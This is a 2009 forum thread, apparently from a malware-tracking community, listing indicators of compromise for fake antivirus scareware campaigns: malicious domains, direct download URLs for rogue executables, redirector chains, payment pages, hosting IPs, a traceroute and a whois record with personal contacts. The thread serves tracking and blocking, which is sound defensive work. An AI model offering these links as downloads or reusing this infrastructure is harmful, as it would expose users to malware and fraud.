allradiohits.com/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
exchangenew.com/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX

fake av winwebsecurity:
Code: [Select]
easynettest.com/download.php
easynettest.com/install/ws.exe
internetprotectioncheck.com/download.php
internetprotectioncheck.com/install/ws.exe
yoursecuritynetwork.com/download.php
yoursecuritynetwork.com/install/ws.exe
securityscantooldirect.com/download.php
securityscantooldirect.com/install/ws.exe
securescantools.com/download.php
securescantools.com/install/ws.exe
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 19, 2009, 01:06:40 pm
fakevimes:
Code: [Select]
fastscan-secure.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq
fastscansecure.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq
fastscan-secure.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq
lylbaov.cn/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq

fakeplus:
Code: [Select]
irexaym.cn/installer.1.exe
winwebsec:
Code: [Select]
greatsecuritytestinternet.com/download.php
greatsecuritytestinternet.com/install/ws.exe

fake scanner page:
Code: [Select]
drlcleaner.info
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 20, 2009, 01:23:18 pm
Some new registrations for malware domains:

Code: [Select]
winfixscanner1.com TODAYNIC.COM, INC. 2009-09-18 - -
 winfixscanner2.com TODAYNIC.COM, INC. 2009-09-18 - -
 winfixscanner8.com TODAYNIC.COM, INC. 2009-09-18 - -
 winfixscanner7.com TODAYNIC.COM, INC. 2009-09-18 - -
 winfixscanner9.com TODAYNIC.COM, INC. 2009-09-18 - -
 fastscan-search.com PSI-USA, INC. DBA DO 2009-09-18 - -
 fastscan-search.net PSI-USA, INC. DBA DO 2009-09-18 - -
 fastscan-secure.com PSI-USA, INC. DBA DO 2009-09-18 - -
 fastscan-secure.net PSI-USA, INC. DBA DO 2009-09-18 - -
 fastscansecure.com PSI-USA, INC. DBA DO 2009-09-18 - -
 fastscansecure.net PSI-USA, INC. DBA DO 2009-09-18 - -
 protect-myzone.com PSI-USA, INC. DBA DO 2009-09-18 - - 
 protect-myzone.net PSI-USA, INC. DBA DO 2009-09-18 - -
 protectmyzone.com PSI-USA, INC. DBA DO 2009-09-18 - -
 protectmyzone.net PSI-USA, INC. DBA DO 2009-09-18 - -
 fast-searchprotection.com PSI-USA, INC. DBA DO 2009-09-18 - -
 fast-searchprotection.net PSI-USA, INC. DBA DO 2009-09-18 - -
 fastsearch-protection.com PSI-USA, INC. DBA DO 2009-09-18 - -
 fastsearch-protection.net PSI-USA, INC. DBA DO 2009-09-18 - -
 fastsearchprotection.com PSI-USA, INC. DBA DO 2009-09-18 - -
 fastsearchprotection.net PSI-USA, INC. DBA DO 2009-09-18 - -
 protect-myzone.com PSI-USA, INC. DBA DO 2009-09-18 - -
 protect-myzone.net PSI-USA, INC. DBA DO 2009-09-18 - -
 protectmyzone.com PSI-USA, INC. DBA DO 2009-09-18 - -
 protectmyzone.net PSI-USA, INC. DBA DO 2009-09-18 - -
 windowspcdefender.net PSI-USA, INC. DBA DO 2009-09-18 - -

A few of them are online except winfixscanner*.com (personal antivirus) which we must wait for the IP(s).
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 20, 2009, 01:24:38 pm
For domain with fastscan, searchprotection, protectzone etc the payload is:

Quote
/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 25, 2009, 03:22:10 am
new registrations for fake av domains :o

Code: [Select]
totalcomputerscan12.com    TODAYNIC.COM, INC. 2009-09-23 - -
my-computer-scan43.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycompscanner.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycompscanner02.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycompscanner07.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycompscanner12.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycompscanner22.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycompscanner31.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycompscanner42.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputer-scanner1a.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputer-scannerp.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputer-scannervv.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputerbestscan11.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputerfastscan11.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputerlivescan2.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputerproscan11.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputersecurescan2.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputersvirscan2.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputertotalscan2.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputertotalscann11.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputerwinscan2.com    TODAYNIC.COM, INC. 2009-09-23 - -
mycomputerwinscan11.com    TODAYNIC.COM, INC. 2009-09-23 - -
mytotalscan11.com    TODAYNIC.COM, INC. 2009-09-23 - -
mytotalscan16.com    TODAYNIC.COM, INC. 2009-09-23 - -
mytotalscanner.com    TODAYNIC.COM, INC. 2009-09-23 - -
mytotalscanner17.com    TODAYNIC.COM, INC. 2009-09-23 - -
pc-scan23.com    TODAYNIC.COM, INC. 2009-09-23 - -
pc-scanner13.com    TODAYNIC.COM, INC. 2009-09-23 - -
pc-scanner16.com    TODAYNIC.COM, INC. 2009-09-23 - -
pc-scanner23.com    TODAYNIC.COM, INC. 2009-09-23 - -
pcvirusscan2.com    TODAYNIC.COM, INC. 2009-09-23 - -
1mytotalscan.com    TODAYNIC.COM, INC. 2009-09-23 - -
computer-scanner21.com    TODAYNIC.COM, INC. 2009-09-23 - -
computer-scanner12.com    TODAYNIC.COM, INC. 2009-09-23 - -
computer-scanner02.com    TODAYNIC.COM, INC. 2009-09-23 - -
computervirusscanner31.com    TODAYNIC.COM, INC. 2009-09-23 - -
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 25, 2009, 04:48:37 am
fake av redirectors:

Code: [Select]
blooddiamond.cn/go.php?id=2038-01&key=f91c68954&p=1
astro-boy.cn/go.php?id=2004&key=ff0057594&p=1
thefinaldestination.cn/go.php?id=2004&key=ff0057594&p=1
inglouriousbasterds.cn/go.php?id=2038-03&key=f91c68954&p=1
hellogoodby.cn/go.php?id=2021&key=01795d4e0&p=1
all-about-steve.cn/go.php?id=2038-03&key=f91c68954&p=1
james-taylor.cn/go.php?id=2004&key=ff0057594&p=1
bill-bailey.cn/go.php?id=2038-01&key=f91c68954&p=1
baconguide.cn/go.php?id=2004&key=ff0057594&p=1
xenotraf1.info/1.php?uid=127&isRedirected=1
securityland.cn/?uid=186&pid=3&ttl=b1d4e571b16
armysun3.com/?pid=75s10&sid=3e6b3a&d=3&name=beastiality+video
acawyr.cn/?uid=186&pid=3&ttl=b1d4e571b16
jennifer-hudson-site.com/?pid=71&sid=f3b6e0
boy-meets-world.com/?pid=21&sid=18b004&uid=108&isRedirected=1
cradleoffilthfan.com/?pid=99&sid=cd5681
marty.id-sign.com/albums/know/i-lay-myself-down?pdf3049.html
sexgirlsteen.com/111/ss.php?uid=194&isRedirected=1
mymobilas.net/monster/index.php
goldstats1.net/redirect2/
getallstats.com/redir/sm/?aid=
gomutescan.com
goneatscan.com

rogue smartprotector
Code: [Select]
scan.securedwebsafesurf.com/smrtprt_3/6/40014/
scan.securedwebsafesurf.com/download/smrtprt/install.php
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 26, 2009, 12:54:18 pm
they all redirects to bigbuckclub.cn to serve a fake av "1mytotalscan.com".

Also used in the redirection "third-eye-blind.com/?pid=252&sid=634302"

Code: [Select]
atlasofworld.cn/1/
bambooclub.cn/1/
beckettonline.cn/1/
clublacosta.cn/1/
coolbackround.cn/1/
coolgwen.cn/1/
cooljerk.cn/1/
coollettering.cn/1/
dailygraphic.cn/1/
devilsclub.cn/1/
eminemworld.cn/1/
greatful.cn/1/
greatfulldead.cn/1/
hostacare.cn/1/
interpollive.cn/1/
livermush.cn/1/
livestockfeed.cn/1/
needdirection.cn/1/
objetodirecto.cn/1/
onlinewill.cn/1/
onlineyahtzee.cn/1/
rummyonline.cn/1/
siriusonline.cn/1/
textsonline.cn/1/
thegreatloop.cn/1/
212.95.55.60/1/
212.95.55.62/1/
217.20.116.212/1/
217.20.116.213/1/
217.20.122.234/1/
217.20.122.235/1/
78.159.122.197/1/
78.159.122.198/1/
78.159.122.199/1/
78.159.122.226/1/
84.16.247.13/1/
84.16.247.14/1/
84.16.247.15/1/
89.149.236.141/1/
89.149.236.143/1/
89.149.236.144/1/
89.149.236.158/1/
89.149.236.185/1/
212.95.55.61/1/
greatpyrenes.cn/1/
mosconecenter.cn/1/
intercoolers.cn/1/
canyonclub.cn/1/
dcucenter.cn/1/
avatarscool.cn/1/
grouporgasm.cn/1/
speculumpages.cn/1/
cartercenter.cn/1/
dailyhotguys.cn/1/
bootyclub.cn/1/
mydailymovie.cn/1/
augustlive.cn/1/
bohemianclub.cn/1/
coolhaircuts.cn/1/
dailythumbs.cn/1/
dailysixer.cn/1/
daysourlives.cn/1/
dimworld.cn/1/
directpc.cn/1/
directtvhdtv.cn/1/
doitcenter.cn/1/
elswingerclub.cn/1/
fatlaneonline.cn/1/
freedvdclubs.cn/1/
freenewsgroup.cn/1/
greatfallsmt.cn/1/
greatgoals.cn/1/
groupnude.cn/1/
hostalmadrid.cn/1/
howdoilive.cn/1/
naturistclubs.cn/1/
newyorkworld.cn/1/
nycclubs.cn/1/
onlinebowling.cn/1/
sonydvdirect.cn/1/
stuffedolives.cn/1/
tottyworld.cn/1/
vizslaclub.cn/1/
vomitonline.cn/1/
welivetogther.cn/1/
zumaonline.cn/1/
humanliver.cn/1/
liverbird.cn/1/
livedeercam.cn/1/
livelounge.cn/1/
liveorgasm.cn/1/
nasalivetv.cn/1/

http://wepawet.iseclab.org/view.php?hash=e21f1121a038a29694c5d481cc4ad096&t=1253969687&type=js
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 26, 2009, 01:08:46 pm
more personal fake av scareware aka alpha antivirus - renamed a few days ago

new registrations:
Code: [Select]
browserspywarecheck.com
my-computer-check24.com
my-computer-scan43.com
my-computer-check15.com
my-computer-check03.com

online:
Code: [Select]
computeron-linescan03.com/load/Alpha-Scan-fc9e07_2018.exe
mycomputeronlinescan04.com/load/Alpha-Scan-fc9e07_2018.exe
mycomputeronlinescan09.com/load/Alpha-Scan-fc9e07_2018.exe
mycomputeronlinescan08.com/load/Alpha-Scan-fc9e07_2018.exe
1mytotalscan.com/scan1/?pid=71&engine=%3DnWy9DTuMzQzLjI0LjE3NyZ0aW1lPTEyNTI5MIcOOAkM
1mytotalscan.com1mytotalscan.com/download/Soft_21.exe
mycomputertotalscann11.com/scan1/?pid=71&engine=%3DnWy9DTuMzQzLjI0LjE3NyZ0aW1lPTEyNTI5MIcOOAkM
mycomputertotalscann11.com1mytotalscan.com/download/Soft_21.exe
mytotalscan16.com/scan1/?pid=71&engine=%3DnWy9DTuMzQzLjI0LjE3NyZ0aW1lPTEyNTI5MIcOOAkM
mytotalscan16.com/download/Soft_21.exe
mytotalscan11.com/download/Soft_21.exe
mytotalscanner.com/scan1/?pid=21&engine=%3D3G39DTuMzQzLjI3LjEyOSZ0aW1lPTEyNTI4MIcOOAkN

redirectors:
Code: [Select]
makkahintro.com/?pid=71&sid=f3b6e0
greece-tours.cn/go.php?id=2004&key=ff0057594&p=1

payment page:
Code: [Select]
statickingdom.com/buy.php
online-soft-payments.com/buy.php
secure.online-soft-payments.com/buy.php
secure.personalpurchuaseweb.com/buy.php?

alpha antivirus?
Code: [Select]
nkdf.org/uploads/software/alpha-antivirus.htmlhttp://wepawet.iseclab.org/view.php?hash=346161bbe6a489a018cf536f4cfe32fd&t=1253838508&type=js
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 28, 2009, 05:34:05 am
All redirects to fake av:

payload: /1/index.php

78.159.122.151

Code: [Select]
bigbuckclub.cn
bowtieclub.cn
clubcytherea.cn
clubplatinumx.cn
coolaltcodes.cn
coolwriting.cn
greatflood.cn
groupdelay.cn
hustlerlive.cn
liverpoolfctv.cn
onlinegrammar.cn
onlinemazes.cn
onlinepolls.cn
onlinesnooker.cn
resumesonline.cn
rvclubs.cn
wescooley.cn

84.16.247.13
Code: [Select]
dailyfreeman.cn
greatfallsmt.cn
greatpyrenes.cn
intercoolers.cn
kiwanisclub.cn
lorshasworld.cn
newyorkworld.cn
onlinetuner.cn
thewinxclub.cn

89.149.236.145
Code: [Select]
animalgroups.cn
animatedworld.cn
argosdirect.cn
aronoffcenter.cn
assistonline.cn
atardeonline.cn
atlantaclubs.cn
atlasofworld.cn
atvclubs.cn
atvdirect.cn
autodirection.cn
bambooclub.cn
barneylive.cn
bbwclubs.cn
bbwgroup.cn
beckettonline.cn
beersonline.cn
bestwebpages.cn
beverlycenter.cn
bibliagratis.cn
billyclub.cn
bloodgrouping.cn
bostonclubs.cn
boxingclubs.cn
bragasgratis.cn
carlitocool.cn
carpetdirect.cn
cdsonline.cn
christmasclub.cn
cineworlduk.cn
clivedavis.cn
clubavalon.cn
clublacosta.cn
clubmixes.cn
clubnikki.cn
clubstiletto.cn
coloniecenter.cn
coolantpump.cn
coolbackround.cn
coolbedding.cn
coolbelts.cn
coolbuilding.cn
coolclipart.cn
coolcrosses.cn
coolgifs.cn
coolgwen.cn
coolhobbies.cn
coolhoodies.cn
cooljerk.cn
coollettering.cn
coollighters.cn
coolnickname.cn
coolonesies.cn
coolpapabell.cn
coolphones.cn
coolringtones.cn
coolsanta.cn
cooltricks.cn
coolwordart.cn
coscoclub.cn
cultgroups.cn
dailygazette.cn
dailygraphic.cn
dailyhottie.cn
dailyhunk.cn
dailyjoke.cn
dailynylon.cn
dailywav.cn
damasgratis.cn
devilsclub.cn
diecastdirect.cn
directcd.cn
directgeneral.cn
directioncard.cn
dunkinsworld.cn
duracool.cn
eattolive.cn
efilive.cn
elephantslive.cn
eminemlive.cn
eminemworld.cn
enginecoolant.cn
ercoworldwide.cn
fastcoolcar.cn
fkksaunaclub.cn
freedailypic.cn
fristcenter.cn
greatful.cn
greatfulldead.cn
greatingcards.cn
greatpoets.cn
greatsayings.cn
greatskate.cn
greatsongs.cn
greatswamp.cn
greattit.cn
greattitties.cn
greattoast.cn
greatzimbabwe.cn
grolieronline.cn
groupbang.cn
groupieluv.cn
groupiesluts.cn
grouppiss.cn
groupxlyrics.cn
heterofanclub.cn
horsecoolers.cn
hostacare.cn
hostessaprons.cn
hostessgift.cn
hostle.cn
hultcenter.cn
icantlive.cn
ichbincool.cn
imabeliver.cn
insectsworld.cn
interpollive.cn
iranhostages.cn
islamicworld.cn
jcrewonline.cn
kennelclubs.cn
knivesonline.cn
kogercenter.cn
labordelivery.cn
learningpages.cn
lindellcooley.cn
livecrickets.cn
liveinfiji.cn
livejas.cn
livekoi.cn
liverabscess.cn
liveradar.cn
liveradiousa.cn
livercells.cn
liverlocation.cn
livermush.cn
liverocksale.cn
liverpoolcity.cn
liverpoolpa.cn
liversupport.cn
livestockfeed.cn
livestreaming.cn
livethislife.cn
livetotell.cn
livewells.cn
livewelltimer.cn
madonnalive.cn
madworldgary.cn
mcwanecenter.cn
midigratis.cn
needdirection.cn
neilwelliver.cn
newworldmap.cn
nikoncoolscan.cn
nitrogengroup.cn
nodirection.cn
nubiaolive.cn
objetodirecto.cn
oliveoildips.cn
oliveskin.cn
onepercenter.cn
onetonline.cn
onlinearcades.cn
onlineclipart.cn
onlinecme.cn
onlinecraps.cn
onlinedangers.cn
onlinediaries.cn
onlinediets.cn
onlineecards.cn
onlinefaxing.cn
onlinegrocer.cn
onlinemapsuk.cn
onlinemaths.cn
onlinepoems.cn
onlinesodoku.cn
onlinevicodin.cn
onlinewill.cn
onlinewills.cn
onlineyahtzee.cn
pacemakerclub.cn
palominoclub.cn
panteralive.cn
pcworldhome.cn
pcworlduk.cn
psoworld.cn
ptlclub.cn
pulpwmphost.cn
quranonline.cn
radioheadlive.cn
rafclub.cn
raquelsworld.cn
reliantcenter.cn
robertclive.cn
rottendaily.cn
rummyonline.cn
rustycooley.cn
scoresclub.cn
shemalecenter.cn
shootersworld.cn
shostakovitch.cn
siriusonline.cn
sissyworld.cn
sliverphone.cn
sliverstein.cn
sofasonline.cn
songmadworld.cn
stevevailive.cn
stripperclubs.cn
tarotgratis.cn
tesolonline.cn
textsonline.cn
thegreatloop.cn
theriverlive.cn
titlepages.cn
tompsoncenter.cn
tortugaclub.cn
transworldmx.cn
trecoolnaked.cn
tvonlinefree.cn
tylenolliver.cn
unbeliveable.cn
utusanonline.cn
vbeltsonline.cn
wangcenter.cn
webhostinfo.cn
webhostnews.cn
welivehere.cn
whittierdaily.cn
wifiesworld.cn
willtolive.cn
worldanimals.cn
worldcensus.cn
worldhungry.cn
worldmissions.cn
worldofcoke.cn
worldrelief.cn
worldrunning.cn
worldtgp.cn
worldtimemap.cn
worldwallmap.cn
yahtzeeonline.cn
youthcenters.cn
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 28, 2009, 05:57:06 am
A nice name server:

http://www.malwareurl.com/ns_listing.php?ns=ns1.nmsrv24.cn

complete list:
Code: [Select]
aarpautoclub.cn
akoonline.cn
amsterdamlive.cn
animalgroups.cn
animatedworld.cn
argosdirect.cn
argosonline.cn
aronoffcenter.cn
assistonline.cn
atardeonline.cn
atlantaclubs.cn
atlasofworld.cn
atvclubs.cn
atvdirect.cn
augustlive.cn
autodirection.cn
avatarscool.cn
bambooclub.cn
barneylive.cn
bbandtonline.cn
bbwclubs.cn
bbwgroup.cn
beckettonline.cn
beersonline.cn
bestwebpages.cn
beverlycenter.cn
biaoliveira.cn
bibliagratis.cn
bigbuckclub.cn
bikerclubs.cn
bikinipages.cn
billyclub.cn
bloodgrouping.cn
bmgmusicclub.cn
bohemianclub.cn
bootyclub.cn
bostonclubs.cn
bowtieclub.cn
boxersarecool.cn
boxingclubs.cn
bragasgratis.cn
businesspages.cn
campersworld.cn
canyonclub.cn
carlitocool.cn
carpetdirect.cn
cartercenter.cn
cdsonline.cn
christmasclub.cn
cigarsonline.cn
cineworlduk.cn
clivedavis.cn
clubavalon.cn
clubchicks.cn
clubcrissy.cn
clubcytherea.cn
clubgetaway.cn
clublacosta.cn
clubmixes.cn
clubnikki.cn
clubpedo.cn
clubpinguin.cn
clubplatinumx.cn
clubstiletto.cn
clubtechno.cn
clubupskirt.cn
coloniecenter.cn
coolaltcodes.cn
coolantpump.cn
coolbackround.cn
coolbedding.cn
coolbelts.cn
coolbikes.cn
coolbuilding.cn
coolclipart.cn
coolcrosses.cn
coolcursors.cn
cooldragons.cn
cooldrawing.cn
coolfacts.cn
coolgifs.cn
coolguns.cn
coolgwen.cn
coolhaircuts.cn
coolhobbies.cn
coolhoodies.cn
cooljerk.cn
coollettering.cn
coollighters.cn
coolnickname.cn
coolonesies.cn
coolpapabell.cn
coolphones.cn
coolpurses.cn
coolringtones.cn
coolroms.cn
coolsanta.cn
coolskulls.cn
cooltattoo.cn
cooltricks.cn
coolwordart.cn
coolwriting.cn
coscoclub.cn
costcoonline.cn
ctrealworld.cn
cultgroups.cn
dailybikinis.cn
dailycomics.cn
dailyfreeman.cn
dailygazette.cn
dailygraphic.cn
dailyhotguys.cn
dailyhottie.cn
dailyhunk.cn
dailyjigsaw.cn
dailyjoke.cn
dailynylon.cn
dailypictures.cn
dailythumbs.cn
dailywav.cn
damasgratis.cn
daysourlives.cn
dcucenter.cn
deftoneslive.cn
detoxcenter.cn
devilsclub.cn
dhldelivery.cn
didrexonline.cn
diecastdirect.cn
dimworld.cn
directcd.cn
directgeneral.cn
directioncard.cn
directobjects.cn
directpc.cn
directtire.cn
directtvdish.cn
directvdealer.cn
directvtivo.cn
disenyworld.cn
doddirectives.cn
doitcenter.cn
dunkinsworld.cn
duracool.cn
dvdmovieclub.cn
eattolive.cn
ebamsworld.cn
ebaumworld.cn
ecdlonline.cn
efilive.cn
elephantslive.cn
elswingerclub.cn
eminemlive.cn
eminemworld.cn
endofzworld.cn
enginecoolant.cn
ercoworldwide.cn
ethnicgroup.cn
ethnicgroups.cn
fastcoolcar.cn
fatlaneonline.cn
fivepopgroup.cn
fkkclub.cn
fkksaunaclub.cn
fotogratis.cn
freedailypic.cn
freedvdclubs.cn
freefunpages.cn
freenewsgroup.cn
fristcenter.cn
ftspages.cn
funnypages.cn
gangbangclub.cn
garymadworld.cn
gmpartsdirect.cn
greatbigtits.cn
greatbreasts.cn
greatdanedog.cn
greatfallsmt.cn
greatflood.cn
greatful.cn
greatfulldead.cn
greatgoals.cn
greatgreyowl.cn
greatingcards.cn
greatlake.cn
greatpoets.cn
greatpyranees.cn
greatpyrenes.cn
greatsayings.cn
greatskate.cn
greatsongs.cn
greatswamp.cn
greattit.cn
greattitties.cn
greattoast.cn
greatzimbabwe.cn
grolieronline.cn
groupbang.cn
groupdelay.cn
groupieluv.cn
groupiesluts.cn
groupnaked.cn
groupnude.cn
grouporgasm.cn
grouppiss.cn
groupxlyrics.cn
gstringpages.cn
halloweenclub.cn
hboonline.cn
heterofanclub.cn
HOMEPAGE
horsecoolers.cn
hostacare.cn
hostagerescue.cn
hostalmadrid.cn
hostedpbx.cn
hostessaprons.cn
hostessgift.cn
hostle.cn
howdoilive.cn
hultcenter.cn
humanliver.cn
hustlerlive.cn
icantlive.cn
ichbincool.cn
imabeliver.cn
insectsworld.cn
intercoolers.cn
interpollive.cn
iranhostages.cn
islamicworld.cn
jcrewonline.cn
journalpages.cn
kennelclubs.cn
keystonegroup.cn
kiwanisclub.cn
knivesonline.cn
kogercenter.cn
labordelivery.cn
learningpages.cn
lindellcooley.cn
livecrickets.cn
livedeercam.cn
liveinfiji.cn
livejas.cn
livekoi.cn
livelyrics.cn
liveoaktrees.cn
liveorgasm.cn
liverabscess.cn
liveradar.cn
liveradiousa.cn
liverbird.cn
livercells.cn
liverlesions.cn
liverlocation.cn
livermoreca.cn
livermush.cn
liverocksale.cn
liverpoolcity.cn
liverpoolfctv.cn
liverpoolpa.cn
liversupport.cn
livestockfeed.cn
livestreaming.cn
livetheriver.cn
livethislife.cn
livetogether.cn
livetotell.cn
livetraps.cn
livewells.cn
livewelltimer.cn
lorshasworld.cn
madonnalive.cn
madworldgary.cn
madworldrem.cn
mcwanecenter.cn
midigratis.cn
mosconecenter.cn
mtvnewshost.cn
mybackpages.cn
mydailymovie.cn
myspacepages.cn
nasalivetv.cn
naturistclubs.cn
neckcooler.cn
needdirection.cn
neilwelliver.cn
newworldmap.cn
newyorkworld.cn
nhsonline.cn
nikoncoolscan.cn
nirvanalive.cn
nitrogengroup.cn
nodirection.cn
ns1.nmsrv24.cn
ns2.nmsrv24.cn
nubiaolive.cn
nudeboysworld.cn
nudegroups.cn
nudistgroups.cn
nuttercenter.cn
nwarapgroup.cn
nycclubs.cn
objetodirecto.cn
oldworldmap.cn
oliveoildips.cn
oliveskin.cn
olivewood.cn
olivewreath.cn
onepercenter.cn
onetonline.cn
onlinearcades.cn
onlinebowling.cn
onlineclipart.cn
onlinecme.cn
onlinecraps.cn
onlinedangers.cn
onlinediaries.cn
onlinediets.cn
onlineecards.cn
onlinefaxing.cn
onlinegrammar.cn
onlinegrocer.cn
onlinehosiery.cn
onlinemapsuk.cn
onlinemaths.cn
onlinemazes.cn
onlinenovels.cn
onlinepoems.cn
onlinepolls.cn
onlinepranks.cn
onlinequizes.cn
onlineromance.cn
onlineruler.cn
onlinesnooker.cn
onlinesodoku.cn
onlinetuner.cn
onlinevicodin.cn
onlinewill.cn
onlinewills.cn
onlineyahtzee.cn
pacemakerclub.cn
palominoclub.cn
panteralive.cn
patriotcenter.cn
pcworldhome.cn
pcworlduk.cn
picturepages.cn
primetimelive.cn
prophesyclub.cn
psoworld.cn
ptlclub.cn
pulpwmphost.cn
quranonline.cn
racquelsworld.cn
radioheadlive.cn
rafclub.cn
ramgolfclubs.cn
raquelsworld.cn
reliantcenter.cn
resumesonline.cn
robertclive.cn
robynlively.cn
rogerscenter.cn
rottendaily.cn
rummyonline.cn
rustycooley.cn
rvclubs.cn
scarlettsworld.cn
scoresclub.cn
sgaonline.cn
shemalecenter.cn
shootersworld.cn
shostakovitch.cn
siriusonline.cn
sissyworld.cn
sliverphone.cn
sliverstein.cn
sofasonline.cn
songmadworld.cn
sonydvdirect.cn
speculumpages.cn
stevevailive.cn
stripperclubs.cn
stuffedolives.cn
tarotgratis.cn
tesolonline.cn
textsonline.cn
thegreatloop.cn
theriverlive.cn
thewinxclub.cn
titlepages.cn
tompsoncenter.cn
tortugaclub.cn
tottyworld.cn
trannyworld.cn
transworldmx.cn
trecoolnaked.cn
tupacalive.cn
tvonlinefree.cn
tylenolliver.cn
unbeliveable.cn
underoathlive.cn
undocooljoke.cn
unoonline.cn
uselesspages.cn
uswhitepages.cn
utusanonline.cn
vbeltsonline.cn
vizslaclub.cn
vomitonline.cn
wangcenter.cn
webhostinfo.cn
webhostnews.cn
weidnercenter.cn
welivehere.cn
welivetogther.cn
wescooley.cn
whittierdaily.cn
wifiesworld.cn
willtolive.cn
worldanimals.cn
worldcensus.cn
worldhungry.cn
worldlolitas.cn
worldmissions.cn
worldofblogs.cn
worldofcoke.cn
worldrelief.cn
worldrunning.cn
worldscollide.cn
worldtgp.cn
worldtimemap.cn
worldwallmap.cn
xeoncoolers.cn
yahtzeeonline.cn
yoladagreat.cn
youthcenters.cn
zeldaonline.cn
zoegroup.cn
zumaonline.cn
Title: Re: Rogue - Fake AV
Post by: cleanmx on September 28, 2009, 07:46:32 am
all located in germany ! kleyer street, is one of the biggest datacenters directly conneced to de-cix...
Code: [Select]
lft -ANTE 89.149.236.145

Tracing _______________________________________________________________!_______.

TTL  LFT trace to 89.149.236.145.internetserviceteam.com (89.149.236.145):80/tcp
 1   [AS15968] [RIPE-C3/NETPILOTGMBH-DE] gwy34.netpilot.net (62.67.240.17) 0.5/1.0ms
 2   [AS15968] [RIPE-C3/NETPILOTGMBH-DE] l3gate1.netpilot.net (62.67.194.62) 1.0/1.7ms
 3   [AS3356] [RIPE-NCC-212/UK-LVLT-990218] gi-6-3.car1.Munich1.Level3.net (212.162.1.65) 2.8/2.2ms
 4   [AS3356] [LVLT-ORG-4-8] ae-4-4.ebr1.Frankfurt1.Level3.net (4.69.134.2) 7.9/8.1ms
 5   [AS3356] [LVLT-ORG-4-8] ae-91-91.csw4.Frankfurt1.Level3.net (4.69.140.14) 9.0/8.9ms
 6   * [AS3356] [LVLT-ORG-4-8] ae-4-99.edge5.Frankfurt1.Level3.net (4.68.23.205) 7.9ms
 7   [AS3356] [RIPE-CBLK3/BBNPLANET-INTL] 195.16.160.46 9.3/30.3ms
**   [firewall] the next gateway may statefully inspect packets
 8   [AS28753] [89-RIPE/NETDIRECT-NET] 89-149-218-178.internetserviceteam.com (89.149.218.178) 13.1/8.5ms
 9   [AS28753] [89-RIPE/GIBIBITS-LTD-966647] [target] 89.149.236.145.internetserviceteam.com (89.149.236.145):80 11.4/9.3/*/*/*ms

LFT's trace took 3.53 seconds.  Resolution required 12.58 seconds.

Code: [Select]
inetnum:        89.149.236.0 - 89.149.236.255
netname:        GIBIBITS-LTD-966647
descr:          Gibibits-Limited
country:        CN
admin-c:        KB1643-RIPE
tech-c:         SR614-RIPE
status:         ASSIGNED PA
mnt-by:         NETDIRECT-MNT
mnt-lower:      NETDIRECT-MNT
mnt-routes:     NETDIRECT-MNT
source:         RIPE # Filtered

person:         Konstantin Begidzhanov
address:        UL. Jovana Tomasevicha 23
address:        Bar
address:        Montenegro
phone:          +381 69 649426
fax-no:         +381 69 649 426
abuse-mailbox:  support@gibibits.com
nic-hdl:        KB1643-RIPE
mnt-by:         NETDIRECT-MNT
source:         RIPE # Filtered

person:       Simon Roehl
address:      netdirekt e. K.
address:      Kleyer Strasse 79 /Tor 14
address:      60326 Frankfurt
address:      DE
phone:        +49 69 90556880
fax-no:       +49 69 905568822
nic-hdl:      SR614-RIPE
mnt-by:       NETDIRECT-MNT
source:       RIPE # Filtered

% Information related to '89.149.192.0/18AS28753'

route:          89.149.192.0/18
descr:          netdirect Frankfurt, DE
origin:         AS28753
org:            ORG-nA8-RIPE
mnt-lower:      NETDIRECT-MNT
